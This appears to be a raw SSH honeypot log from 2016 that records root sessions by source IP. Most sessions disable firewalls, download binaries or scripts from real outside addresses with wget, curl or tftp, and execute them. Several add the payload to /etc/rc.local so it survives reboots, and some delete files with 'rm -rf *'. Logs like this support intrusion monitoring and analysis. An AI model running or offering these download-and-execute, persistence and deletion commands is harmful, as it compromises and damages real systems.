cd /tmp || cd /var/run || cd /mnt
wget http://159.89.52.13/ssh.sh
curl -O http://159.89.52.13/ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp 159.89.52.13 -c get ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp -r ssh2.sh -g 159.89.52.13
chmod 777 ssh2.sh
sh ssh2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh ssh1.sh
rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh
rm -rf *

From 86.120.151.199  5-Jul-2016 03:01:41 ssh2 root
w
ls -a
exit

From 51.15.193.245  5-Jul-2016 12:47:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.20/8UsA.sh; curl -O http://82.202.235.20/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.20 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.20; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.20 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt
wget http://82.202.235.20/8UsA.sh
curl -O http://82.202.235.20/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 82.202.235.20 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 82.202.235.20
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 103.20.249.191  6-Jul-2016 21:11:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://122.0.80.183:5198/rwd;chmod 777 rwd;./rwd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://122.0.80.183:5198/rwd
chmod 777 rwd
./rwd

From 103.20.249.191  9-Jul-2016 11:17:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.20.249.191:5198/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.20.249.191:5198/breeb
chmod 777 breeb
./breeb

From 222.186.190.229  9-Jul-2016 21:38:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.232.89.227:5198/rwd;chmod 777 rwd;./rwd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.232.89.227:5198/rwd
chmod 777 rwd
./rwd

From 23.251.55.90 10-Jul-2016 07:59:27 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.10.172.233:11/syn;chmod 777 syn;./syn;echo "cd /tmp/">>/etc/rc.local;echo "./syn&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.10.172.233:11/syn
chmod 777 syn
./syn
echo "cd /tmp/">>/etc/rc.local
echo "./syn&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 37.126.118.79 11-Jul-2016 00:40:37 ssh2 root
ls
znc
exit

From 171.213.83.191 12-Jul-2016 01:23:19 ssh2 root
uname -a
service iptables stop /etc/init.d/iptables stop service iptables stop
service iptables stop
wget http://112.83.192.246:33066/lin

From 91.224.160.108 13-Jul-2016 15:09:49 ssh2 root

From 60.10.114.151 14-Jul-2016 01:56:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /usr/bin/;rm -rf xm.sh;wget -c http://116.196.120.20:443/xm.sh;chmod 777 xm.sh;sh xm.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /usr/bin/
rm -rf xm.sh
wget -c http://116.196.120.20:443/xm.sh
chmod 777 xm.sh
sh xm.sh

From 182.16.75.218 15-Jul-2016 22:32:01 ssh2 root
ifconfig
ls
netstat -antp
ls

From 115.231.218.173 18-Jul-2016 22:58:47 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.231.217.109:11315/c32;chmod 777 c32;./c32;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.231.217.109:11315/c32
chmod 777 c32
./c32

From 115.231.218.173 19-Jul-2016 19:40:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.231.217.109:11315/c33;chmod 777 c33;./c33;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.231.217.109:11315/c33
chmod 777 c33
./c33

From 220.191.208.195 22-Jul-2016 09:46:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.155.229.230:5198/rwd;chmod 777 rwd;./rwd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://211.155.229.230:5198/rwd
chmod 777 rwd
./rwd

From 115.231.218.173 24-Jul-2016 03:10:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.231.220.21:31589/u1;chmod 777 u1;./u1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.231.220.21:31589/u1
chmod 777 u1
./u1

From 213.32.88.170 24-Jul-2016 20:49:09 ssh2 root
Exec uname -a ; lscpu ; w
uname -a
lscpu
w

From 115.231.218.173 25-Jul-2016 10:13:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.230.126.82:11315/u1;chmod 777 u1;./u1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.230.126.82:11315/u1
chmod 777 u1
./u1

From 174.138.14.128 30-Jul-2016 13:35:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.19/8UsA.sh; curl -O http://82.202.235.19/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.19 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.19; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.19 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf
cd /tmp || cd /var/run || cd /mnt
wget http://82.202.235.19/8UsA.sh
curl -O http://82.202.235.19/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 82.202.235.19 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 82.202.235.19
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf

From 220.191.208.195  1-Aug-2016 07:48:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.155.229.230:5198/aiai;chmod 777 aiai;./aiai;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://211.155.229.230:5198/aiai
chmod 777 aiai
./aiai

From 115.231.218.173  7-Aug-2016 19:03:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://36.251.184.196:32156/ss1;chmod 777 ss1;./ss1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://36.251.184.196:32156/ss1
chmod 777 ss1
./ss1

From 220.191.208.195  8-Aug-2016 15:45:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.155.229.230:5198/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://211.155.229.230:5198/breeb
chmod 777 breeb
./breeb

From 220.191.208.195 10-Aug-2016 09:09:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://211.155.229.230:5198/ces;chmod 777 ces;./ces;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://211.155.229.230:5198/ces
chmod 777 ces
./ces

From 220.191.208.195 14-Aug-2016 06:17:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.178.55.106:50668/ces;chmod 777 ces;./ces;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.178.55.106:50668/ces
chmod 777 ces
./ces

From 220.191.208.195 15-Aug-2016 13:20:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.178.55.106:50668/beeb;chmod 777 beeb;./beeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.178.55.106:50668/beeb
chmod 777 beeb
./beeb

From 118.193.189.229 15-Aug-2016 23:41:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.189.229:8080/sgg;chmod 777 sgg;./sgg;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.193.189.229:8080/sgg
chmod 777 sgg
./sgg

From 118.193.189.229 16-Aug-2016 20:23:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.189.229:8080/sg;chmod 777 sg;./sg;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.193.189.229:8080/sg
chmod 777 sg
./sg

From 139.204.24.57 19-Aug-2016 00:08:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.34.162:8080/Lin3.6;chmod 777 Lin3.6;./Lin3.6;echo "cd /tmp/">>/etc/rc.local;echo "./Lin3.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.34.162:8080/Lin3.6
chmod 777 Lin3.6
./Lin3.6
echo "cd /tmp/">>/etc/rc.local
echo "./Lin3.6&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.204.24.57 19-Aug-2016 10:29:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://111.73.45.16:8543/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://111.73.45.16:8543/linux-arm
chmod 777 linux-arm
./linux-arm
echo "cd /tmp/">>/etc/rc.local
echo "./linux-arm&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.204.24.57 19-Aug-2016 20:50:19 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.34.168:50130/weadfg;chmod 777 weadfg;./weadfg;echo "cd /tmp/">>/etc/rc.local;echo "./weadfg&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.34.168:50130/weadfg
chmod 777 weadfg
./weadfg
echo "cd /tmp/">>/etc/rc.local
echo "./weadfg&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.203.98.201 20-Aug-2016 17:32:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://180.97.239.33:59446/opns;chmod 777 opns;./opns;echo "cd /tmp/">>/etc/rc.local;echo "./opns&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://180.97.239.33:59446/opns
chmod 777 opns
./opns
echo "cd /tmp/">>/etc/rc.local
echo "./opns&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.203.98.201 21-Aug-2016 14:14:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://222.186.59.71:9872/Linux;chmod 777 Linux;./Linux;echo "cd /tmp/">>/etc/rc.local;echo "./Linux&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://222.186.59.71:9872/Linux
chmod 777 Linux
./Linux
echo "cd /tmp/">>/etc/rc.local
echo "./Linux&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.203.98.201 22-Aug-2016 00:35:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://111.73.45.16:8543/Linux-syn25000;chmod 777 Linux-syn25000;./Linux-syn25000;echo "cd /tmp/">>/etc/rc.local;echo "./Linux-syn25000&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://111.73.45.16:8543/Linux-syn25000
chmod 777 Linux-syn25000
./Linux-syn25000
echo "cd /tmp/">>/etc/rc.local
echo "./Linux-syn25000&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.203.98.201 22-Aug-2016 10:56:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://183.60.204.58:9697/wget;chmod 777 wget;./wget;echo "cd /tmp/">>/etc/rc.local;echo "./wget&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://183.60.204.58:9697/wget
chmod 777 wget
./wget
echo "cd /tmp/">>/etc/rc.local
echo "./wget&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.203.98.201 22-Aug-2016 21:17:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;L1 -c http://107.189.48.35:6666/L1;chmod 777 L1;./L1;echo "cd /tmp/">>/etc/rc.local;echo "./L1&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
L1 -c http://107.189.48.35:6666/L1
chmod 777 L1
./L1
echo "cd /tmp/">>/etc/rc.local
echo "./L1&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.203.98.201 23-Aug-2016 17:59:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://111.73.45.16:52430/opks;chmod 777 opks;./opks;echo "cd /tmp/">>/etc/rc.local;echo "./opks&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://111.73.45.16:52430/opks
chmod 777 opks
./opks
echo "cd /tmp/">>/etc/rc.local
echo "./opks&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 14.157.73.70 28-Aug-2016 01:28:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://220.169.242.158:6666/xudp;chmod 777 xudp;./xudp;echo "cd /tmp/">>/etc/rc.local;echo "./xudp&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://220.169.242.158:6666/xudp
chmod 777 xudp
./xudp
echo "cd /tmp/">>/etc/rc.local
echo "./xudp&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 14.157.74.245 28-Aug-2016 11:49:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://220.169.242.158:6666/2;chmod 777 2;./2;echo "cd /tmp/">>/etc/rc.local;echo "./2&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://220.169.242.158:6666/2
chmod 777 2
./2
echo "cd /tmp/">>/etc/rc.local
echo "./2&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.233.85 28-Aug-2016 22:10:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://183.60.204.58:9697/miusi;chmod 777 miusi;./miusi;echo "cd /tmp/">>/etc/rc.local;echo "./miusi&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://183.60.204.58:9697/miusi
chmod 777 miusi
./miusi
echo "cd /tmp/">>/etc/rc.local
echo "./miusi&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 139.203.101.211 29-Aug-2016 08:31:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://114.215.199.164:8080/linux-arm;chmod 777 linux-arm;.nux-arm;echo "cd /tmp/">>/etc/rc.local;echo ".nux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://114.215.199.164:8080/linux-arm
chmod 777 linux-arm
.nux-arm
echo "cd /tmp/">>/etc/rc.local
echo ".nux-arm&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 192.99.81.66 30-Aug-2016 14:48:46 ssh2 root
ssh
ssh root@167.114.3.141
exit

From 159.65.34.63 30-Aug-2016 16:54:13 ssh2 root
uname -a
lscpu
cat /proc/pcuinfo
cat /proc/cp
cd /home
ls
top

From 159.65.34.63 30-Aug-2016 21:47:17 ssh2 root
ps -ef
cat /etc/*release
history

From 192.99.81.66 31-Aug-2016 02:40:21 ssh2 root
ssh
ssh root@167.114.3.141-
exit

From 159.65.34.63 31-Aug-2016 07:33:25 ssh2 root
uname -a
top
exit

From 113.204.53.134  3-Sep-2016 12:43:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.214.170.92:7788/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.214.170.92:7788/breeb
chmod 777 breeb
./breeb

From 159.89.179.210  3-Sep-2016 13:42:29 ssh2 root
uname -a
lscpu
cat /etc/cpuinfo
tput rmcup
top
ps -ef
history

From 172.87.26.140  3-Sep-2016 23:04:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.26.140:8080/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://172.87.26.140:8080/linux-arm
chmod 777 linux-arm
./linux-arm
echo "cd /tmp/">>/etc/rc.local
echo "./linux-arm&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 172.87.26.140  4-Sep-2016 09:25:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.26.140:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;echo "cd /tmp/">>/etc/rc.local;echo "./Linux2.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://172.87.26.140:8080/Linux2.6
chmod 777 Linux2.6
./Linux2.6
echo "cd /tmp/">>/etc/rc.local
echo "./Linux2.6&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 222.186.50.56  6-Sep-2016 23:30:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.50.56:4478/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.50.56:4478/breeb
chmod 777 breeb
./breeb

From 222.186.56.176  9-Sep-2016 23:57:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://121.10.172.185:15432/L24E;chmod 777 L24E;./L24E;echo "cd /tmp/">>/etc/rc.local;echo "./L24E&";wget -c http://121.10.172.185:15432/SYny;chmod 777 SYny./SYny;echo "cd /tmp/">>/etc/rc.local;echo "./SYny&";wget -c http://121.10.172.185:15432/UDse;chmod 777 UDse;./UDse;echo "cd /tmp/">>/etc/rc.local;echo "./UDse&";wget -c http://121.10.172.185:15432/Freedy;chmod 777 Freedy;./Freedy;echo "cd /tmp/">>/etc/rc.local;echo "./Freedy&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://121.10.172.185:15432/L24E
chmod 777 L24E
./L24E
echo "cd /tmp/">>/etc/rc.local
echo "./L24E&"
wget -c http://121.10.172.185:15432/SYny
chmod 777 SYny./SYny
echo "cd /tmp/">>/etc/rc.local
echo "./SYny&"
wget -c http://121.10.172.185:15432/UDse
chmod 777 UDse
./UDse
echo "cd /tmp/">>/etc/rc.local
echo "./UDse&"
wget -c http://121.10.172.185:15432/Freedy
chmod 777 Freedy
./Freedy
echo "cd /tmp/">>/etc/rc.local
echo "./Freedy&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 120.76.112.19 15-Sep-2016 14:30:15 ssh2 root
wget http://117.21.191.201:9090/260
curl -O http://117.21.191.201:9090/260
wget http://117.21.191.201:9090/04

From 123.191.66.176 17-Sep-2016 18:15:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/006;chmod 777 006;./006;echo "cd /tmp/">>/etc/rc.local;echo "./006&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://171.92.208.129:3123/006
chmod 777 006
./006
echo "cd /tmp/">>/etc/rc.local
echo "./006&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 123.191.66.176 18-Sep-2016 04:36:03 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/007;chmod 777 007;./007;echo "cd /tmp/">>/etc/rc.local;echo "./007&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://171.92.208.129:3123/007
chmod 777 007
./007
echo "cd /tmp/">>/etc/rc.local
echo "./007&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 123.191.66.176 18-Sep-2016 14:57:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/007;chmod 777 007;./007;echo "cd /tmp/">>/etc/rc.local;echo "./007&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://171.92.208.129:3123/007
chmod 777 007
./007
echo "cd /tmp/">>/etc/rc.local
echo "./007&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/007;chmod 777 007;./007;echo "cd /tmp/">>/etc/rc.local;echo "./007&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://171.92.208.129:3123/007
chmod 777 007
./007
echo "cd /tmp/">>/etc/rc.local
echo "./007&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 61.147.110.23 21-Sep-2016 15:23:47 ssh2 root
service iptables stop wget http://171.92.208.129:3123/001
chmod 777 001
nohup ./001 wget http://171.92.208.128:3123/007 chmod 777 007 nohup

From 222.187.224.159 30-Sep-2016 06:23:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://171.92.208.129:3123/001;chmod 777 001;./001;echo "cd /tmp/">>/etc/rc.local;echo "./001&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://171.92.208.129:3123/001
chmod 777 001
./001
echo "cd /tmp/">>/etc/rc.local
echo "./001&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 221.194.44.209  1-Oct-2016 13:26:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.158:7723/pzmo;chmod 777 qzmo;./qzmo;echo "cd /tmp/">>/etc/rc.local;echo "./qzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.158:7723/pzmo
chmod 777 qzmo
./qzmo
echo "cd /tmp/">>/etc/rc.local
echo "./qzmo&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 221.194.44.209  1-Oct-2016 23:46:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.158:7723/pzmo;chmod 777 pzmo;./pzmo;echo "cd /tmp/">>/etc/rc.local;echo "./pzmo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://221.194.44.158:7723/pzmo
chmod 777 pzmo
./pzmo
